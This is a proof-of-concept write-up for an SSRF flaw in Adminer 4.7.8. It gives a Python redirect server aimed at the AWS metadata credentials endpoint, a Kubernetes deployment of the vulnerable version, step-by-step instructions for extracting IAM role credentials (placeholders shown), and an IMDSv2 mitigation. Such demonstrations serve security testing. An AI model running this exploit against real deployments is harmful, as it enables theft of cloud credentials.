POC process
- Construct attack machine to listener and redirect the credentials url
1#!/usr/bin/env python3
2
3
4# ./redirect.py 1337 http://169.254.169.254/latest/meta-data/iam/security-credentials/
5
6import sys
7from http.server import HTTPServer, BaseHTTPRequestHandler
8
9if len(sys.argv)-1 != 2:
10 print("""
11 Usage: {} <port_number> <url>
12 """.format(sys.argv[0]))
13 sys.exit()
14
15class Redirect(BaseHTTPRequestHandler):
16 def do_GET(self):
17 self.send_response(301)
18 self.send_header('Location', sys.argv[2])
19 self.end_headers()
20
21HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()
Install the has vulnerability program for example: Adminer v4.7.8
1apiVersion: apps/v1
2kind: Deployment
3metadata:
4 # Unique key of the Deployment instance
5 name: adminer-v4.7.8
6 namespace: default
7spec:
8 # 3 Pods should exist at all times.
9 replicas: 1
10 selector:
11 matchLabels:
12 app: adminer-v4.7.8
13 template:
14 metadata:
15 labels:
16 # Apply this label to pods and default
17 # the Deployment label selector to this value
18 app: adminer-v4.7.8
19 # annotations:
20 # instrumentation.opentelemetry.io/inject-java: 'true'
21 # instrumentation.opentelemetry.io/container-names: "php-app-demo"
22
23 spec:
24 containers:
25 - name: adminer
26 # Run this image
27 image: adminer:4.7.8
28 # command: ["php", "-S", "[::]:8080", "-t", "/var/www/html"]
29 imagePullPolicy: IfNotPresent
30 ports:
31 - name: http
32 containerPort: 8080
33 protocol: TCP
34 env:
35 - name: TEST_AUTOINSTRUMENTATION
36 value: test_value
Execution testing
- Forward the port to local use
kubectl port-forward deploy/adminer-v4.7.8 -n default 8080:8080
- Use the Elasticsearch(beta) System to login
- Fill the remote python program address and port: x.x.x.x:1337
- If the AWS use metadatav1 this should print the ROLE name
- Change the python program redirect url to add the role name to suffix
- Continue the login button, this shold print the credentials
Use awscli and the credentials
1export AWS_ACCESS_KEY_ID=ASIAEXAMPLEEXAMPLEEE
2export AWS_SECRET_ACCESS_KEY=EXAMPLEEXAMPLEEXAMPLEEXAMPLEEXAMPLESEXAM
3export AWS_SESSION_TOKEN=EXAMPLEEXAMPLEEXAMPLE...<snip>
Please upgrade the IMDS to v2
1TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
2curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/
Reference